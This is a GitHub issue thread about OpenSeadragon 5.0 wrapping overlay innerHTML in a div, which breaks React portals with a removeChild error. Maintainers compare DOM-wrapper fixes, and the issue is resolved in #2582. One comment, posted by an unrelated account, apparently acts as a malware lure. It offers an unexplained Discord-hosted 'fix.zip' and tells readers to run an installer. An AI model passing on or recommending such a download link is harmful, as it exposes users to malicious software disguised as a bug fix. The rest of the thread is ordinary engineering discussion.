### ISSUE TITLE
Failed to execute 'removeChild' on 'Node' React issue after 5.0 update due to innerHTML being wrapped

### ISSUE THREAD

**Issue by oblak1** [openseadragon/openseadragon#2576]
There is an issue now with React and using `ReactDOM.createPortal(children, rootElemRef.current)` where rootElemRef is an actual reference in addOverlay and the children are whatever you would put inside an overlay- (basic idea for wrapper taken from [here](https://github.com/stephenwf/use-open-seadragon/blob/master/src/components/Overlay.tsx))

```
viewer.addOverlay({
        element: rootElemRef.current,
        ...props
      })
```

When removed the React throws `Failed to execute 'removeChild' on 'Node': The node to be removed is not a child of this node`. This is due to the fact that innerHML now gets wrapped in `div`, [link to commit](https://github.com/openseadragon/openseadragon/commit/396fcb33a516e8eca591a713d85fd07306863060#diff-becdf76e1b32846ca5db8f0722754831e21c8e2f657fb8e4343931797973a502R132)

This could be bypassed by using `rootElemRef.current.children[0]` but then again it's not an elegant solution as it is better to manipulate the actual ref as well as having an issue of detecting when the child is actually there since addOverlay isn't triggering a rerender.

I know React isn't the scope of this project but still mentioning this incase someone has the same issue or has a better solution or an idea.

**Comment by Dominic54321** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by iangilman** [comment]
Interesting! Thank you for filing this. I'm not sure what the best solution is... Hopefully people have ideas.

You might also file a note on https://github.com/stephenwf/use-open-seadragon/issues.

Of course one option would be to build your overlay without React, but then you don't get the advantage of React. Btw, I'm not familiar with `createPortal`... Does it allow for rerenders, or is it just a one-shot thing?

**Comment by oblak1** [comment]
The `createPortal` is basically the same as the usual render it just portals it to the defined container. I think it is needed here because overlays need to be rendered inside a dedicated osd div.

I think the error is basically the same as if someone would run a React app and then go to Chrome Inspector Tool and drag html divs around and then run some state changes - React isn't aware of external tree changes.  

I'm gonna test out some solutions and if I find something that isn't to hacky I'll definitely post it.

**Comment by stephenwf** [comment]
Hmm, yes the setting of the innerHTML seems to be causing the issue there.

I think if the overlay needs a wrapper there could be 2 elements on the `Overlay` class.

So this:
```js
this.element.innerHTML = "<div>" + this.element.innerHTML + "</div>";
```

Could be:
```js
this.wrapperElement = document.createElement('div');
this.wrapperElement.appendChild(this.element);
```

And then you could apply the CSS transforms to the outer element. It would be essentially the same thing, but the contents of the passed in element are unchanged. 

Although it is React that is throwing this error, I think it could be replicated:

```js
const overlay = document.createElement('div');
const something = document.createElement('p');

overlay.appendChild(something);

// Pass `overlay` to the Overlay class in OSD.

// Later...
overlay.removeChild(something); // throws

something.innerHTML = '...'; // Does not apply the changes
```

If the overlay is passed in explicitly, I feel like the DOM elements should remain stable.

**Comment by iangilman** [comment]
Interesting. That does seem like a cleaner way of wrapping it... I don't remember why we went with the `innerHTML` approach. 

Is anyone up for giving it a try in the OSD code?

@BeebBenjamin (author of  #2546), any thoughts?

**Comment by BeebBenjamin** [comment]
I didn't actually want to add this feature oringally.  I thought we should originally leave it and let people handle the HTML in the overlay.  But it was suggested that users would want to be able to flip the content of the overlay independently of the overlay.  This is because flipping the overlay causes any text to be reversed.  So I came up with an inelegant solution that worked for the suite of tests we have.  We could do any of the following:

1. Tear out the flipping of the content.
2. Find a better way of wrapping.
3. Add some additional tests for some of the well known packages that depend on OSD to see if changes break stuff such as this React package.

These are just suggestions and I don't mind taking on the fix since my PR caused this.

**Comment by pearcetm** [comment]
> We could do any of the following:

> 1. Tear out the flipping of the content.
> 2. Find a better way of wrapping.
> 3. Add some additional tests for some of the well known packages that depend on OSD to see if changes break stuff such as this React package.


I'd vote for option 2. 

I think what @stephenwf proposed above makes sense. I would guess the root of the problem is that the wrapping is done by setting `this.element.innerHTML = "<div>" + this.element.innerHTML + "</div>";` - the problem is, all references to the original DOM elements (and bound data, event handlers, etc) are lost since they are re-created from new HTML text. Appending the existing DOM element to the new wrapper via `wrapper.appendChild(existingNode)` will help a lot. And it would be ideal to set all of the properties (like `style`) on the wrapper so that OSD is only changing elements that it controls.

**Comment by BeebBenjamin** [comment]
Adding a wrapper and appending the element to it just disables the flipping of the content.  This is why I wished to rather extend the element, which is what I was attempting to do.  If there's a way to modify the existing node (wrap it in a div) without removing the references?

**Comment by BeebBenjamin** [comment]
Would the following work:
```javascript
 this.element = options.element;
        this.elementContent = this.element.firstChild;
        this.elementWrapper = document.createElement('div');
        this.elementContent.parentNode.insertBefore(this.elementWrapper, this.elementContent);
        this.elementWrapper.appendChild(this.elementContent);
```

**Comment by BeebBenjamin** [comment]
More like something like this (the previous example broke tests):

```javaScript
this.element = options.element;
    this.elementContent = this.element.firstChild;
    this.elementWrapper = document.createElement('div');
    this.element.insertBefore(this.elementWrapper, this.elementContent);
    if (this.elementContent){
        this.elementWrapper.appendChild(this.elementContent);
    }
```

**Comment by BeebBenjamin** [comment]
I want to write a unit test (but not in React) to see if the above fixes it, and if not helps me to.  What would be your expected outcome to restoring functionality? @stephenwf @oblak1  I need a sequence of operations you wish to do with the overlay to see what helps preserve this functionality.

**Comment by iangilman** [comment]
@BeebBenjamin Thank you for continuing to be involved with this patch. I remember that you were reluctant to go with the wrapping and I insisted on it. If at any point you want to wash your hands of it, I totally understand!

I forget if we already covered this, but why don't we do it like this?

```
this.element = document.createElement('div');
this.element.appendChild(options.element);
```

**Comment by msalsbery** [comment]
> I remember that you were reluctant to go with the wrapping and I insisted on it. If at any point you want to wash your hands of it, I totally understand!
>

😅

**Comment by BeebBenjamin** [comment]
> this.element = document.createElement('div');
> this.element.appendChild(options.element);

This breaks the tests, producing the following error:

`TypeError: Cannot read properties of null (reading 'getBounds')`

 Where as the following:

```javascript
   this.element = options.element;
   this.elementContent = this.element.firstChild;
   this.elementWrapper = document.createElement('div');
   this.element.insertBefore(this.elementWrapper, this.elementContent);
   if (this.elementContent){
       this.elementWrapper.appendChild(this.elementContent);
   }
```
Doesn't, probably because we're making `this.element` something else.  I think maybe leaving `this.element` as is might be the better way to not introduce more side effects, even if the way we wrap it is more roundabout.

**Comment by BeebBenjamin** [comment]
I also, still need some test conditions for React to see if this fixes the issue with removing Children and reusing the references later.  No point doing this, if it's still broken according to the issue.

**Comment by oblak1** [comment]
> I want to write a unit test (but not in React) to see if the above fixes it, and if not helps me to. What would be your expected outcome to restoring functionality? @stephenwf @oblak1 I need a sequence of operations you wish to do with the overlay to see what helps preserve this functionality.

I'm not sure if this will help, but the general idea is to reference the element using addOverlay. Once we have a reference to the element, we should be able to manipulate its style and basic HTML attributes. 
This reference (whether it's the element itself or a child of a wrapper element, depending on how it's done in OSD) will serve as the portal container in React and its children are whatever we want to put inside overlay. It's important that this portal container doesn't have any children on its own, as React won't expect them when calling removeChild.

**Comment by iangilman** [comment]
> This breaks the tests, producing the following error:
> 
> TypeError: Cannot read properties of null (reading 'getBounds')

I see! This is because we are using `this.element` to test against. We can certainly fix that by explicitly having the element we were given and the wrapper element be stored in separate variables and use each as appropriate. 

> Where as the following:
> 
>    this.element = options.element;
>    this.elementContent = this.element.firstChild;
>    this.elementWrapper = document.createElement('div');
>    this.element.insertBefore(this.elementWrapper, this.elementContent);
>    if (this.elementContent){
>        this.elementWrapper.appendChild(this.elementContent);
>    }
> 
> Doesn't, probably because we're making this.element something else. I think maybe leaving this.element as is might be the better way to not introduce more side effects, even if the way we wrap it is more roundabout.

My concern with this is what if `options.element` has more than one child? I suppose we could loop through all of the children. I don't know... taking the element apart and plucking at its pieces seems like it might be hard to get right in all scenarios.

**Comment by BeebBenjamin** [comment]
Okay, I've made some progress. I have a unit test which passes before the PR and breaks after the PR.  So I will know when I fix this.  My proposal above does the same as adding a div to the innerHTML, so I won't take that any further. I am now working on the suggested strategy.

**Comment by BeebBenjamin** [comment]
I can get the demos to look the same, but the unit tests are failing.  So still working through the fix.

**Comment by iangilman** [comment]
I believe this is now fixed by #2582 . Thank you @BeebBenjamin !
